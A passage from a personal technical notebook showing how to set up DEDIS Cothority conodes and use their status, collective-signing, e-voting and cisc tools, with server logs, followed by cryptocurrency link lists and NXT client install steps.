We now need to get a reachable address for other Servers and clients to contact you. This address will be put in a group definition file that you can share and combine with others to form a Cothority roster. Creating private and public keys for suite Ed25519. Public key: b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02

Give a description of the cothority[New cothority]: cothority-1

(continues on next page)

35 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) Please enter a folder for the configuration files[/root/.config/conode]: Success! You can now use the conode with the config file /root/.config/conode/private.

˓→toml Saved a group definition snippet for your server at /root/.config/conode/public.toml [[servers]] Address= "tls://192.168.0.180:6879" Suite= "Ed25519" Public= "b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02" Description= "New cothority"

All configurations saved, ready to serve signatures now.

Check conode_data created directory:

$ ls ~/conode_data/ private.toml public.toml

$ cat ~/conode_data/public.toml [[servers]] Address= "tls://192.168.0.180:6879" Suite= "Ed25519" Public= "b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02" Description= "cothority-1"

Starting Conode:

$ docker run --rm -p 6879-6880:6879-6880 --name conode -v ~/conode_data:/conode_data

˓→dedis/conode:latest

Output:

3:( onet.newServiceManager: 241) - Starting service ftCoSiService 3:( onet.newServiceManager: 253) - Started Service ftCoSiService 3:( onet.newServiceManager: 241) - Starting service Status 3:( onet.newServiceManager: 253) - Started Service Status 3:( onet.newServiceManager: 241) - Starting service Skipchain 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 SkipchainPropagate 357a62ee-c495-365b-9aed-e781d5a8285e 3:( onet.newServiceManager: 253) - Started Service Skipchain 3:( onet.newServiceManager: 241) - Starting service PoPServer 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 PoPPropagateFinal 251a9e2d-b3a4-3a25-ac5b-e6b89d265be9 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 PoPPropagateDescription 2144ba19-9d1e-33a0-9353-

˓→c2940af373eb 3:( onet.newServiceManager: 253) - Started Service PoPServer 3:( onet.newServiceManager: 241) - Starting service Identity 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 IdentityPropagateID 7b7a50c0-7c42-3465-8fd7-42b5111c6e46 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 IdentityPropagateSB 6b35d1a9-5f89-39b7-bc64-d39424dad041 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 IdentityPropagateConf 816f3244-bae7-38ca-a916-7dca0c635d6a 3:( identity.( *Service).tryLoad: 795) - Successfully loaded 3:( onet.newServiceManager: 253) - Started Service Identity 3:( onet.newServiceManager: 241) - Starting service evoting 1:( service.new: 659) - Pin:

˓→f810aac19b690830d3e0c79a6c00a279 (continues on next page)

36 Chapter 11. Cothority Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 3:( onet.newServiceManager: 253) - Started Service evoting 3:( onet.newServiceManager: 257) - tls://192.168.0.180:6879

˓→instantiated all services 1:( onet.( *Server).Start: 203) - Starting server at 2019-02-04 ˓→07:53:05 on address tls://192.168.0.180:6879 with public key

˓→b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02 2:( onet.( *WebSocket).start: 93) - Starting to listen on0.0.0. ˓→0:6880 https://github.com/dedis/cothority/blob/master/conode/Docker.md#docker

11.1.2 Apps

Status of conodes

Copy the public.toml file from servers to somewhere you want to run status command:

$ scp [email protected]:~/conode_data/public.toml ct1_public.toml $ scp [email protected]:~/conode_data/public.toml ct2_public.toml $ scp [email protected]:~/conode_data/public.toml ct3_public.toml $ cat ct1_public.toml ct2_public.toml ct3_public.toml > public.toml $ cat public.toml

[[servers]] Address= "tls://192.168.0.180:6879" Suite= "Ed25519" Public= "b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02" Description= "cothority-1" [[servers]] Address= "tls://192.168.0.181:6879" Suite= "Ed25519" Public= "7a6e03ba71bd87aa1a62972eb20788ab21250ea23ad3166e995225278b227983" Description= "cothority-2" [[servers]] Address= "tls://192.168.0.182:6879" Suite= "Ed25519" Public= "2c84becca826a737560d572ce1f4e4bbda47f32044611e660dcf5b27cf2c30c2" Description= "cothority-3"

To get the status of the conodes in the cothority:

$ go get github.com/dedis/cothority/status # @note: You can use `DEDIS_GROUP` env and set path of `public.toml` and run `status`

˓→cmd like this: $ export DEDIS_GROUP=public.toml $ ~/go/bin/status --group $DEDIS_GROUP

# @note: And also you can change the name of `public.toml` to `group.toml` and run

˓→`status` cmd like this: $ ~/go/bin/status

Output:

Db.FreeAlloc: 8192 Db.FreePageN:0 (continues on next page)

11.1. Tips 37 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) Db.FreelistInuse: 32 Db.Open: true Db.OpenTxN:0 Db.PendingPageN:2 Db.Tx.CursorCount: 32 Db.Tx.NodeCount:7 Db.Tx.NodeDeref:0 Db.Tx.PageAlloc: 57344 Db.Tx.PageCount: 14 Db.Tx.Rebalance:0 Db.Tx.RebalanceTime: 0s Db.Tx.Spill:7 Db.Tx.SpillTime: 68.734µs Db.Tx.Split:0 Db.Tx.Write: 21 Db.Tx.WriteTime: 13.224429ms Db.TxN: 14 Generic.Available_Services: Identity,PoPServer,Skipchain,Status,evoting,ftCoSiService Generic.ConnType: tls Generic.Description: cothority-1 Generic.GoModuleInfo: Generic.GoRelease: go1.10.1 Generic.Host: 192.168.0.180 Generic.Port: 6879 Generic.RX_bytes: 1322 Generic.System: linux/amd64/go1.10.1 Generic.TX_bytes: 2095 Generic.Uptime: 2h32m46.804728179s Generic.Version:2.0 Skipblock.Blocks:0 Skipblock.Bytes:0 Db.FreeAlloc: 8192 Db.FreePageN:0 Db.FreelistInuse: 32 Db.Open: true Db.OpenTxN:0 Db.PendingPageN:2 Db.Tx.CursorCount: 27 Db.Tx.NodeCount:7 Db.Tx.NodeDeref:0 Db.Tx.PageAlloc: 57344 Db.Tx.PageCount: 14 Db.Tx.Rebalance:0 Db.Tx.RebalanceTime: 0s Db.Tx.Spill:7 Db.Tx.SpillTime: 22.611µs Db.Tx.Split:0 Db.Tx.Write: 21 Db.Tx.WriteTime: 14.09274ms Db.TxN:9 Generic.Available_Services: Identity,PoPServer,Skipchain,Status,evoting,ftCoSiService Generic.ConnType: tls Generic.Description: cothority-2 Generic.GoModuleInfo: Generic.GoRelease: go1.10.1 Generic.Host: 192.168.0.181 Generic.Port: 6879 (continues on next page)

38 Chapter 11. Cothority Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) Generic.RX_bytes: 2095 Generic.System: linux/amd64/go1.10.1 Generic.TX_bytes: 1322 Generic.Uptime: 1h50m37.783106977s Generic.Version:2.0 Skipblock.Blocks:0 Skipblock.Bytes:0 Db.FreeAlloc: 8192 Db.FreePageN:0 Db.FreelistInuse: 32 Db.Open: true Db.OpenTxN:0 Db.PendingPageN:2 Db.Tx.CursorCount: 24 Db.Tx.NodeCount:7 Db.Tx.NodeDeref:0 Db.Tx.PageAlloc: 57344 Db.Tx.PageCount: 14 Db.Tx.Rebalance:0 Db.Tx.RebalanceTime: 0s Db.Tx.Spill:7 Db.Tx.SpillTime: 24.517µs Db.Tx.Split:0 Db.Tx.Write: 21 Db.Tx.WriteTime: 14.166472ms Db.TxN:6 Generic.Available_Services: Identity,PoPServer,Skipchain,Status,evoting,ftCoSiService Generic.ConnType: tls Generic.Description: cothority-3 Generic.GoModuleInfo: Generic.GoRelease: go1.10.1 Generic.Host: 192.168.0.182 Generic.Port: 6879 Generic.RX_bytes:0 Generic.System: linux/amd64/go1.10.1 Generic.TX_bytes:0 Generic.Uptime: 2m26.909041005s Generic.Version:2.0 Skipblock.Blocks:0 Skipblock.Bytes:0 https://github.com/dedis/cothority#status https://github.com/dedis/cothority/blob/master/status/README.md

Collective Signing

$ go get github.com/dedis/cothority/ftcosi $ date > /tmp/my_file # @note: You can change the name of `group.toml` to `public.toml`! and run `ftcosi`

˓→cmd like this: $ ~/go/bin/ftcosi sign /tmp/my_file | tee sig.json # @note: And also you can use `DEDIS_GROUP` env and set path of `public.toml` and run

˓→`ftcosi` cmd like this: $ export DEDIS_GROUP=group.toml $ ~/go/bin/ftcosi sign --group $DEDIS_GROUP /tmp/my_file | tee sig.json

11.1. Tips 39 Omid Raha MyStack Documentation, Release 0.1

Output:

{ "Hash": "f28d7749dfd8dc2275345a134995e4b432fe051e56d1d2cac2d346cf475c5e52", "Signature":

˓→"ec4ccdb41c2c37caad5a26a0e575bff9aefea7f6993e3a47dc30ca8e888d73d9eb24289227e6cc9d699be407791da2e57ded947930ba4586baee3143918fc00203

˓→" }

Verify:

$ ~/go/bin/ftcosi verify --group $DEDIS_GROUP --signature sig.json /tmp/my_file

[+] OK: Signature is valid. https://github.com/dedis/cothority#collective-signing

Evoting

$ go get github.com/dedis/cothority/evoting/evoting-admin/ $ cd $GOPATH/src/github.com/dedis/cothority/evoting/evoting-admin/&& go build -o

˓→$GOPATH/bin/evoting ./...

$ ~/go/bin/evoting-admin --help

-admins string list of admin users -id string ID of the master chain to modify(optional) -key string public key of authentication server -pin string service pin -roster string path to roster toml file -show Show the current Master config -sig string A signature proving that you can login to Tequila with the given SCIPER.

Make a new master chain:

$ cp public.toml roster.toml $ evoting-admin -roster roster.toml -pin f810aac19b690830d3e0c79a6c00a279 -admins0,1,

˓→2,3

I:(main.main: 83) - Auth-server private key:

˓→4fba8025c5ba783fe30bdb2bab653307a1fa23e29f9f42fe9fbaca93dbf05d09 I:(main.main: 114) - Auth-server public key:

˓→87e1df80e37bd624c3a0a5852f28cf97d0705017c5da0bb7b0a047137db5d6ed I:(main.main: 115) - Master ID:

˓→cf5f2f9bc05fc115e4d2ef869405a3e0841dff80bc8b36183f5f9d4142470b0c

Output of 192.168.0.180 conode server:

40 Chapter 11. Cothority Omid Raha MyStack Documentation, Release 0.1

2:( onet.wsHandler.ServeHTTP: 178) - ws request from 192.168.0.

˓→107:36154: evoting/Link 2:( skipchain.( *Service).StoreSkipBlock: 177) - Creating new skipchain with ˓→roster[tls://192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.168.0.182:6879] 3:( skipchain.( *Service).StoreSkipBlock: 349) - Propagate1 blocks 3:( skipchain.( *Service).startPropagation: 1145) - Starting to propagate for ˓→service tls://192.168.0.180:6879 3:( messaging.NewPropagationFunc.func2: 114) - tls://192.168.0.181:6879 ˓→Starting to propagate *skipchain.PropagateSkipBlocks 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(c687bde8-b612-577b-bc3c-dfb982382b64): SkipchainPropagate 3:( network.( *Router).connect: 204) - tls://[::]:6879 Connecting to ˓→tls://192.168.0.180:6879 2:( network.NewTLSConn: 369) - NewTLSConn to: tls://192.168.0.

˓→180:6879 2:(network.NewTLSListenerWithListenAddr.func1: 243) - Got new connection request

˓→from: 172.17.0.1:37406 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02 3:( network.( *Router).connect: 210) - tls://[::]:6879 Connected to ˓→tls://192.168.0.180:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.180:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.180:6879 3:( messaging.( *Propagate).Dispatch: 165) - tls://192.168.0.180:6879 Got ˓→data from tls://192.168.0.180:6879 and setting timeout to 15s 3:( messaging.( *Propagate).Dispatch: 182) - tls://192.168.0.180:6879 ˓→Sending to children 3:( network.( *Router).connect: 204) - tls://[::]:6879 Connecting to ˓→tls://192.168.0.181:6879 2:( network.NewTLSConn: 369) - NewTLSConn to: tls://192.168.0.

˓→181:6879 3:( network.( *Router).connect: 204) - tls://[::]:6879 Connecting to ˓→tls://192.168.0.182:6879 2:( network.NewTLSConn: 369) - NewTLSConn to: tls://192.168.0.

˓→182:6879 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→2c84becca826a737560d572ce1f4e4bbda47f32044611e660dcf5b27cf2c30c2 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→7a6e03ba71bd87aa1a62972eb20788ab21250ea23ad3166e995225278b227983 3:( network.( *Router).connect: 210) - tls://[::]:6879 Connected to ˓→tls://192.168.0.182:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.182:6879 3:( network.( *Router).connect: 210) - tls://[::]:6879 Connected to ˓→tls://192.168.0.181:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.181:6879 3:( messaging.( *Propagate).Dispatch: 215) - tls://192.168.0.180:6879 done, ˓→isroot: true 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(c687bde8-b612-577b-bc3c-dfb982382b64): SkipchainPropagate has finished. Deleting

˓→its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(c687bde8-b612-577b-bc3c-dfb982382b64): SkipchainPropagate (continues on next page)

11.1. Tips 41 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 3:( messaging.propagateStartAndWait: 142) - Finished propagation with3

˓→replies 3:( skipchain.( *Service).StoreSkipBlock: 359) - Block added, replying. New ˓→latest is: cf5f2f9bc05fc115e4d2ef869405a3e0841dff80bc8b36183f5f9d4142470b0c, at

˓→index0 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 2:( skipchain.( *Service).StoreSkipBlock: 206) - Adding block with roster[tls:// ˓→192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.168.0.182:6879] to

˓→cf5f2f9bc05fc115e4d2ef869405a3e0841dff80bc8b36183f5f9d4142470b0c 3:( skipchain.( *Service).StoreSkipBlock: 315) - Checking if all nodes from ˓→roster accept block 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(skipchain.ProtoExtendRoster:a8a68b7b918356b69ce0333776a166b0) with flags0 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(skipchain.ProtoExtendRosterReply:bb6cd0d0ac0b5a5c84a5279f0fc266a6) with flags0 3:( skipchain.( *ExtendRoster).Start: 90) - Starting Protocol ExtendRoster 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(d157abe9-6533-5490-a32a-8d206d8469d1): scExtendRoster 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(d157abe9-6533-5490-a32a-8d206d8469d1): scExtendRoster has finished. Deleting its

˓→resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(d157abe9-6533-5490-a32a-8d206d8469d1): scExtendRoster 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( skipchain.( *Service).forwardLinkLevel0: 825) - tls://192.168.0.180:6879 is ˓→adding forward-link to[tls://192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.

˓→168.0.182:6879]:0->1 3:( byzcoinx.( *ByzCoinX).Start: 77) - Starting prepare phase 3:( protocol.( *FtCosi).Start: 332) - Starting CoSi 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(d629e4fc-b3db-5a96-85f9-37d7fb49cd49): SkipchainBFTNew 3:( protocol.( *FtCosi).Dispatch: 120) - leader protocol started 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(protocol.Stop:9d8b4bf59a8a5ea79bfda30dbb7e4be8) with flags0 3:( protocol.( *SubFtCosi).Start: 277) - tls://192.168.0.180:6879 ˓→Starting subCoSi 3:( protocol.( *FtCosi).Dispatch: 148) - tls://192.168.0.180:6879 all ˓→protocols started 3:( protocol.( *FtCosi).Dispatch.func1: 124) - tls://192.168.0.180:6879 ˓→starting verification 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(eee01075-292f-5128-8bb0-c1b54565e9ae): SkipchainBFTNew_subcosi_prep 3:( protocol.( *SubFtCosi).Dispatch: 105) - tls://192.168.0.180:6879 ˓→received announcement 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(26104825-e456-5c14-9d7c-91c42903402a): SkipchainBFTNew_cosi_prep 3:( protocol.( *SubFtCosi).Dispatch: 167) - tls://192.168.0.180:6879 ˓→finished receiving commitments,1 commitment(s) received 3:( protocol.( *FtCosi).Dispatch: 164) - root-node generating global ˓→challenge 3:( protocol.( *SubFtCosi).Dispatch: 220) - tls://192.168.0.180:6879 ˓→received challenge 3:( protocol.( *SubFtCosi).Dispatch: 238) - tls://192.168.0.180:6879 ˓→received all1 response(s) 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(eee01075-292f-5128-8bb0-c1b54565e9ae): SkipchainBFTNew_subcosi_prep has finished.

˓→Deleting its resources (continues on next page)

42 Chapter 11. Cothority Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(eee01075-292f-5128-8bb0-c1b54565e9ae): SkipchainBFTNew_subcosi_prep 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( protocol.generateResponse: 111) - tls://192.168.0.180:6879

˓→Verification successful 3:( protocol.generateResponse: 120) - tls://192.168.0.180:6879 is

˓→done aggregating responses with total of2 responses 3:( protocol.( *FtCosi).Dispatch: 218) - tls://192.168.0.180:6879 starts ˓→final signature 3:( protocol.( *FtCosi).Dispatch: 226) - Root-node is done without errors 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(26104825-e456-5c14-9d7c-91c42903402a): SkipchainBFTNew_cosi_prep has finished.

˓→Deleting its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(26104825-e456-5c14-9d7c-91c42903402a): SkipchainBFTNew_cosi_prep 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( byzcoinx.( *ByzCoinX).Dispatch: 149) - Finished prepare phase 3:( byzcoinx.( *ByzCoinX).Dispatch: 152) - Starting commit phase 3:( protocol.( *FtCosi).Start: 332) - Starting CoSi 3:( protocol.( *FtCosi).Dispatch: 120) - leader protocol started 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(5af294ee-859a-5df6-8b6d-118f54741ede): SkipchainBFTNew_cosi_commit 3:( protocol.( *FtCosi).Dispatch.func1: 124) - tls://192.168.0.180:6879 ˓→starting verification 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(protocol.Stop:9d8b4bf59a8a5ea79bfda30dbb7e4be8) with flags0 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(f7176736-e73e-579d-a837-c0f0e9578d9a): SkipchainBFTNew_subcosi_commit 3:( protocol.( *SubFtCosi).Start: 277) - tls://192.168.0.180:6879 ˓→Starting subCoSi 3:( protocol.( *FtCosi).Dispatch: 148) - tls://192.168.0.180:6879 all ˓→protocols started 3:( protocol.( *SubFtCosi).Dispatch: 105) - tls://192.168.0.180:6879 ˓→received announcement 3:( protocol.( *SubFtCosi).Dispatch: 167) - tls://192.168.0.180:6879 ˓→finished receiving commitments,1 commitment(s) received 3:( protocol.( *FtCosi).Dispatch: 164) - root-node generating global ˓→challenge 3:( protocol.( *SubFtCosi).Dispatch: 220) - tls://192.168.0.180:6879 ˓→received challenge 3:( protocol.( *SubFtCosi).Dispatch: 238) - tls://192.168.0.180:6879 ˓→received all1 response(s) 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(f7176736-e73e-579d-a837-c0f0e9578d9a): SkipchainBFTNew_subcosi_commit has finished.

˓→ Deleting its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(f7176736-e73e-579d-a837-c0f0e9578d9a): SkipchainBFTNew_subcosi_commit 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( protocol.generateResponse: 111) - tls://192.168.0.180:6879

˓→Verification successful 3:( protocol.generateResponse: 120) - tls://192.168.0.180:6879 is

˓→done aggregating responses with total of2 responses 3:( protocol.( *FtCosi).Dispatch: 218) - tls://192.168.0.180:6879 starts ˓→final signature 3:( protocol.( *FtCosi).Dispatch: 226) - Root-node is done without errors 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(5af294ee-859a-5df6-8b6d-118f54741ede): SkipchainBFTNew_cosi_commit has finished.

˓→Deleting its resources (continues on next page)

11.1. Tips 43 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(5af294ee-859a-5df6-8b6d-118f54741ede): SkipchainBFTNew_cosi_commit 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( byzcoinx.( *ByzCoinX).Dispatch: 166) - Finished commit phase 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(d629e4fc-b3db-5a96-85f9-37d7fb49cd49): SkipchainBFTNew has finished. Deleting its

˓→resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(d629e4fc-b3db-5a96-85f9-37d7fb49cd49): SkipchainBFTNew 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( skipchain.( *Service).forwardLinkLevel0: 845) - tls://192.168.0.180:6879 adds ˓→forward-link to[tls://192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.168.0.

˓→182:6879]:0->1 - fwlinks:[] 3:( skipchain.( *Service).startPropagation: 1145) - Starting to propagate for ˓→service tls://192.168.0.180:6879 3:( messaging.NewPropagationFunc.func2: 114) - tls://192.168.0.180:6879 ˓→Starting to propagate *skipchain.PropagateSkipBlocks 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(099668f4-049f-5d59-b850-6227e076ccd9): SkipchainPropagate 3:( messaging.( *Propagate).Dispatch: 165) - tls://192.168.0.180:6879 Got ˓→data from tls://192.168.0.180:6879 and setting timeout to 15s 3:( messaging.( *Propagate).Dispatch: 182) - tls://192.168.0.180:6879 ˓→Sending to children 3:( messaging.( *Propagate).Dispatch: 215) - tls://192.168.0.180:6879 done, ˓→isroot: true 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(099668f4-049f-5d59-b850-6227e076ccd9): SkipchainPropagate has finished. Deleting

˓→its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(099668f4-049f-5d59-b850-6227e076ccd9): SkipchainPropagate 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( messaging.propagateStartAndWait: 142) - Finished propagation with3

˓→replies 3:( skipchain.( *Service).StoreSkipBlock: 329) - Asking forward-links from all ˓→linked blocks 3:( skipchain.( *Service).StoreSkipBlock: 349) - Propagate2 blocks 3:( skipchain.( *Service).startPropagation: 1145) - Starting to propagate for ˓→service tls://192.168.0.180:6879 3:( messaging.NewPropagationFunc.func2: 114) - tls://192.168.0.181:6879 ˓→Starting to propagate *skipchain.PropagateSkipBlocks 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(c545a7d1-af42-518b-a7e9-4538384620cf): SkipchainPropagate 3:( messaging.( *Propagate).Dispatch: 165) - tls://192.168.0.180:6879 Got ˓→data from tls://192.168.0.180:6879 and setting timeout to 15s 3:( messaging.( *Propagate).Dispatch: 182) - tls://192.168.0.180:6879 ˓→Sending to children 3:( messaging.( *Propagate).Dispatch: 215) - tls://192.168.0.180:6879 done, ˓→isroot: true 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(c545a7d1-af42-518b-a7e9-4538384620cf): SkipchainPropagate has finished. Deleting

˓→its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(c545a7d1-af42-518b-a7e9-4538384620cf): SkipchainPropagate 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( messaging.propagateStartAndWait: 142) - Finished propagation with3

˓→replies 3:( skipchain.( *Service).StoreSkipBlock: 359) - Block added, replying. New ˓→latest is: 84291836f8e62e7f4b619de39d724eb5546ebecf24392155627181df3d24ffcc,(continues onat next page)

˓→index1

44 Chapter 11. Cothority Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) https://github.com/dedis/cothority/blob/master/evoting/README.md https://github.com/dedis/cothority/tree/master/evoting/evoting-admin

CISC

$ cisc --help

link, ln create and use links with admin privileges skipchain, sc work with the underlying skipchain data, cfg updating and voting on data keyvalue, kv storing and retrieving key/value pairs ssh interacting with the ssh-keys stored in the skipchain follow, f follow skipchains web, w add a web-site to a skipchain cert, c create and use links with admin privileges help, h Shows a list of commands or help for one command

Connecting to one conode:

$ cisc link pin 192.168.0.180:6879

Please read PIN in server-log

Output of 192.168.0.180 conode server:

2:(onet.wsHandler.ServeHTTP: 178) - ws request from 192.168.0.107:37832: Identity/

˓→PinRequest 3:(identity.( *Service).PinRequest: 117) - PinRequest tls://192.168.0.180:6879 I:(identity.( *Service).PinRequest: 121) - PIN: 494777 3:(onet.wsHandler.ServeHTTP: 188) - Got an error while executing Identity/

˓→PinRequest: Read PIN in server-log

$ cisc link pin 192.168.0.180:6879 494777

Successfully linked with tcp://192.168.0.180:6879

$ ls ~/.cisc/ config.bin

Creating an identity:

$ cisc skipchain create group.toml

Found full link to conode: 192.168.0.180:6879

˓→44251bc84a7fe20a2fe0064b4ff858a01a5c14a3d4196239ea5d29e8b5cde354 Creating new blockchain-identity for omid in roster[tls://192.168.0.180:6879

˓→tls://192.168.0.181:6879 tls://192.168.0.182:6879] New cisc-id is: c1d0e4ab9b91781101406687c8d72992039955b653dfdc037fbf5758ccbd2a8d

Storing a key/value pair

11.1. Tips 45 Omid Raha MyStack Documentation, Release 0.1

$ cisc keyvalue add name omid

Stored key-value pair

$ cisc keyvalue add family raha

Stored key-value pair

$ cisc keyvalue list

family: raha name: omid

$ cisc keyvalue list c1d0e4ab9b91781101406687c8d72992039955b653dfdc037fbf5758ccbd2a8d

family: raha name: omid https://github.com/dedis/cothority/blob/master/cisc/CLI.md

46 Chapter 11. Cothority CHAPTER 12

Crypto currency

Contents:

12.1 Tips

12.1.1 Create your own block chain https://www.walletbuilders.com/

12.1.2 Coins Analysis https://coincheckup.com/ http://cryptocoinviz.com/ https://coinmarketcap.com/ https://bittrex.com/home/markets https://www.coinspot.com.au/buy/nxt

12.1.3 Exchange coins https://hitbtc.com/exchange https://changelly.com/ https://www.aex.com/ https://shapeshift.io/#/coins

47 Omid Raha MyStack Documentation, Release 0.1

12.1.4 Buy/Sell coins https://www.litebit.eu/en/buy/nxt https://www.bitfinex.com/

12.1.5 Buy coins by Paypal https://www.cointal.com/ https://localbitcoins.com/ https://www.virwox.com/register.php https://www.lakebtc.com/register

12.1.6 Tools https://github.com/ccxt/ccxt https://github.com/AbenezerMamo/crypto-signal https://github.com/triestpa/Cryptocurrency-Analysis-Python http://chainquery.com/bitcoin-api/getdifficulty

12.1.7 Python

$ pip install ccxt

12.1.8 Bitcoin

Generate wallet https://liteaddress.org/ https://www.bitaddress.org/ https://tools.bitcoin.com/paper-wallet/ https://bitcoinpaperwallet.com/bitcoinpaperwallet/generate-wallet.html

12.1.9 Universal JavaScript Client-Side Wallet Generator https://github.com/walletgeneratornet/WalletGenerator.net https://walletgenerator.net/ https://walletgenerator.net/?currency=Zcash

Blockchain explorer https://blockchain.info/ https://blockexplorer.com/

48 Chapter 12. Crypto currency Omid Raha MyStack Documentation, Release 0.1

12.1.10 NXT https://nxtplatform.org/get-started/for-you/

Install https://nxtwiki.org/wiki/How-To:InstallNRSLinux

$ wget https://bitbucket.org/Jelurida/nxt/downloads/nxt-client-1.11.10.zip $ unzip nxt-client-1.11.10.zip $ cd nxt $ vim conf/nxt-default.properties nxt.allowedBotHosts=*; nxt.apiServerHost=0.0.0.0 nxt.allowedUserHosts=*; nxt.uiServerHost=0.0.0.0 # it will not be downloading the blockchain, which will be accessed using public

˓→nodes nxt.isLightClient=true

$ ./run.sh https://bitcoin.stackexchange.com/a/36825 https://nxtwiki.org/wiki/Nxt-default_properties_configuration_file http://nxtwiki.org/wiki/FAQ#Is_there_a_light_wallet.2Fclient.3F

Blockchain explorer https://nxtportal.org/monitor/ https://mynxt.info/blockexplorer/

Node explorer https://peerexplorer.com/

Others http://nxtwiki.org/wiki/FAQ#What_is_the_size_of_the_Nxt_blockchain.3F https://www.nxter.org/new-to-nxt/ https://steemit.com/bitcoin-exchange/@arnoldwish/the-best-bitcoin-exchanges-of-2017-buy-bitcoin-with-paypal-credit-card-or-debit-card

12.1.11 Dogecoin http://dogecoin.com/

Install http://dogecoin.com/getting-started/#linux-desktop-os

